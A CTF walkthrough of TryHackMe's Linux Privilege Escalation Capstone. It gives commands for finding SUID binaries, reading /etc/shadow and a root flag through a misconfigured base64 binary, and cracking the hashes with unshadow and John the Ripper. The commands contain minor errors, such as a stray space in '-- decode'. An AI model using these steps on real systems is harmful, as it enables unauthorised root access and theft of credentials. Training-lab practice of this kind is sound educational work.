Table of contents
This walkthrough will go over the Linux Privilege Escalation Capstone found on TryHackMe. The objective is to assess your understanding gained from the prior course content by placing you in an internal environment where you already possess low-level privileges on a Linux server. Your task is to identify an attack vector that enables you to escalate your privileges to root.
Ready, set, go!
First, we want to check and see if there is a cron job
that we can exploit.
cat /etc/crontab
There's nothing for us here. Let's proceed to see which binaries are available for us to run with sudo
privileges.
find / -type f -perm -04000 -ls 2>/dev/null
We can exploit the base64
binary with incorrect permissions to obtain the root flag.
LFILE=/home/rootflag/flag2.txt
base64 "$LFILE" | base64 --decode
Well, that worked for obtaining the root flag! Acquiring flag1 was a bit more challenging and required the use of unshadow
. This command merges the passwd
and shadow
files into a single file, which can then be utilized by John-the-Ripper
to crack passwords.
LFILE=/etc/shadow
base64 "$LFILE" | base64 -- decode
Copy and save the content into a shadow.txt
file.
Grab the contents from passwd
.
cat /etc/passwd
Copy and save the content into a passwd.txt
file.
Combine the files and use John-the-Ripper
to crack the passwords:
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
Now that we have obtained missy's
account password, we can switch users and retrieve the final flag from her Documents
folder:
/home/missy/documents
Summary
In this walkthrough, we explore the Linux Privilege Escalation Capstone on TryHackMe, aiming to escalate our privileges to root. We begin by checking for exploitable cron jobs and identifying binaries with sudo privileges. We exploit the base64 binary to obtain the root flag and use unshadow and John-the-Ripper to crack passwords and retrieve the final flag from missy's Documents folder.